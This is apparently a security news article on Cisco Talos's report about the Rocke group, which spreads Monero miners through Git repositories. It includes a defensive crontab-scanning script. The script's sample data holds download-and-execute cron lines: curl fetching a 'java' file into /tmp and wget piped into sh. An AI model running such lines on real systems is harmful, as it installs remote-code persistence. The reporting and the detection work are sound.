Security researchers have uncovered a new Chinese-language threat actor named Rocke that has been leveraging various Git repositories and payloads to distribute and execute a Monero-mining malware. According to Cisco Talos researchers, the threat actor was first spotted in April 2018.
"Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named 'c-999.' Subsequently, the Gitee user page transitioned to 'c-888'," researchers noted in a blog post. "Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named 'c-18'.
"The repositories on both Gitee and GitLab were identical. All the repositories had a folder called 'ss' that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner."
Once the targeted system is compromised, a cron job is installed to establish persistence on the device. The file itself is a shell script that downloads mining executables from the threat actor's Git repositories, which are saved under the filename "java."
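The persistence pattern described above (a cron entry that fetches a payload from a Git hosting site and stages it under an innocuous name) is something a defender can hunt for in crontabs. The following is an added example, not code from the article or from Talos; the crontab lines, user name and URL paths are constructed, and the heuristics are assumptions about what such an entry looks like, not signatures.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample crontab (not from the article). The last two entries mimic
# the pattern the article describes: a scheduled fetch from a Git hosting site
# that stores a miner under a harmless-looking name such as "java".
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL https://gitee.com/example-user/repo/raw/master/ss/java -o /tmp/java && chmod +x /tmp/java && /tmp/java
* * * * * wget -q -O - https://gitlab.com/example-user/repo/raw/master/ss/a.sh | sh
"""

GIT_HOSTS = ("gitee.com", "gitlab.com", "github.com")   # hosting sites named in the article
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
STAGED_NAMES = ("java",)   # filename the article says the miner is saved as

def cron_command(line: str) -> Optional[str]:
    """Return the command part of a crontab line, or None for comments/blank lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 5)   # five schedule fields, then the command
    return fields[5] if len(fields) == 6 else None

def suspicious_reasons(cmd: str) -> List[str]:
    """Heuristics for download-and-execute persistence in one cron command."""
    reasons = []
    if DOWNLOADERS.search(cmd) and any(h in cmd for h in GIT_HOSTS):
        reasons.append("fetches from a Git hosting site")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes remote content into a shell")
    if "/tmp/" in cmd and any(re.search(rf"/{n}\b", cmd) for n in STAGED_NAMES):
        reasons.append("stages a file with an innocuous name under /tmp")
    return reasons

def scan_crontab(text: str) -> List[Tuple[str, List[str]]]:
    """Return (command, reasons) for every cron entry that trips a heuristic."""
    hits = []
    for line in text.splitlines():
        cmd = cron_command(line)
        if cmd:
            reasons = suspicious_reasons(cmd)
            if reasons:
                hits.append((cmd, reasons))
    return hits

if __name__ == "__main__":
    for cmd, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS: {cmd}\n  - " + "\n  - ".join(reasons))
```

On a live host the same function can be fed the output of `crontab -l` for each user plus the files under /etc/cron.d; any hit should be checked against the binary it points to rather than treated as a verdict on its own.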
Researchers noted that Rocke has been exploiting several vulnerabilities to deploy the malware including Apache Struts flaws, an Oracle WebLogic server vulnerability and a critical Java deserialization flaw in Adobe ColdFusion.
In late July, Cisco Talos found the same threat actor engaging in another similar campaign that gave them more insight into the threat actor's methods.
Rocke has been selling a $14 Monero Silent miner as well that has been advertised as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls."
Researchers noted that the PE32 Monero miner sample shared similarities with the popular penetration testing software Cobalt Strike that could give the attacker greater control over the infected system.
"The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure," the researchers noted. "So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group."
Cisco Talos also believes that Rocke is operating from Jiangxi Province and has been observed trying to access cloud storage services and manuals for programming in Chinese Easy Language.
"Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines," researchers concluded. "It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.
"Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals."